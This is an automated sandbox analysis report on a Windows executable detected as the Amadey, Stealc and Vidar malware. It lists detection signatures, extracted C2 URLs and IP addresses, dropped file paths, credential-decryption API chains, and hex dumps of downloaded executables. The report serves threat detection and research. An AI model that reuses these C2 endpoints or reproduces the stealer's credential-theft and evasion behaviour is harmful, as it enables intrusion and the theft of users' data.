Windows Analysis Report
8NjcvPNvUr.exe

Overview

General Information

Sample name:	8NjcvPNvUr.exe renamed because original name is a hash value
Original sample name:	e04afeeb6bb46b372bc1d7c2e2f25ead.exe
Analysis ID:	1483377
MD5:	e04afeeb6bb46b372bc1d7c2e2f25ead
SHA1:	684d7f3cf0f8f94b1a58b39a97fd2f8f37f4a380
SHA256:	71db154390c24f07114784bf363d39dac8f1699c517064327724f83ca4acdfb9
Tags:	32exe
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Potentially malicious time measurement code found

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8NjcvPNvUr.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/Iw	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phpaY	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpM:S	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Local	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/cwx	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlly	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php-w6	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dll9	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/soka/random.exeN	Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/Qwj	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Avira: detection malicious, Label: HEUR/AGEN.1314148
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314148
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userKFHCAEGCBF.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7872.7.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Multi AV Scanner detection for domain / URL

Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Virustotal: Detection: 17%	Perma Link
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlly	Virustotal: Detection: 22%	Perma Link
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllF	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 8NjcvPNvUr.exe

Virustotal: Detection: 52%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\userKFHCAEGCBF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 8NjcvPNvUr.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0040C660 memset,lstrlenA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,	8_2_0040C660
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	8_2_6C1D6C80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C32A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	8_2_6C32A9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C2F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	8_2_6C2F4420
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C324440 PK11_PrivDecrypt,	8_2_6C324440
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3244C0 PK11_PubEncrypt,	8_2_6C3244C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	8_2_6C3725B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C308670 PK11_ExportEncryptedPrivKeyInfo,	8_2_6C308670
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C32A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	8_2_6C32A650
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C30E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	8_2_6C30E6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C34A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	8_2_6C34A730

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack

Uses 32bit PE files

Source: 8NjcvPNvUr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49564 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49565 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49568 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: nss3.pdb@ source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: mozglue.pdb source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 0MB later: 44MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor	IPs: 185.215.113.19

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:04 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Sat, 27 Jul 2024 03:21:04 GMTConnection: keep-aliveETag: "66a467a0-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 67 94 73 10 06 fa 20 10 06 fa 20 10 06 fa 20 7f 70 51 20 0b 06 fa 20 7f 70 64 20 00 06 fa 20 7f 70 50 20 74 06 fa 20 19 7e 69 20 1b 06 fa 20 10 06 fb 20 64 06 fa 20 7f 70 55 20 11 06 fa 20 7f 70 60 20 11 06 fa 20 7f 70 67 20 11 06 fa 20 52 69 63 68 10 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 2c 7f 18 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 e9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 9a 07 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 18 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e8 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 61 73 69 77 69 64 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 75 66 75 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:07 GMTContent-Type: application/octet-streamContent-Length: 3171840Last-Modified: Sat, 27 Jul 2024 03:08:39 GMTConnection: keep-aliveETag: "66a464b7-306600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 98 64 a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 44 58 ad 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 ad 00 00 04 00 00 13 ca 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 40 8c 00 4e 0d 00 00 a0 4d 8c 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 8c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 b0 78 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 60 21 00 00 10 8c 00 00 5e 21 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 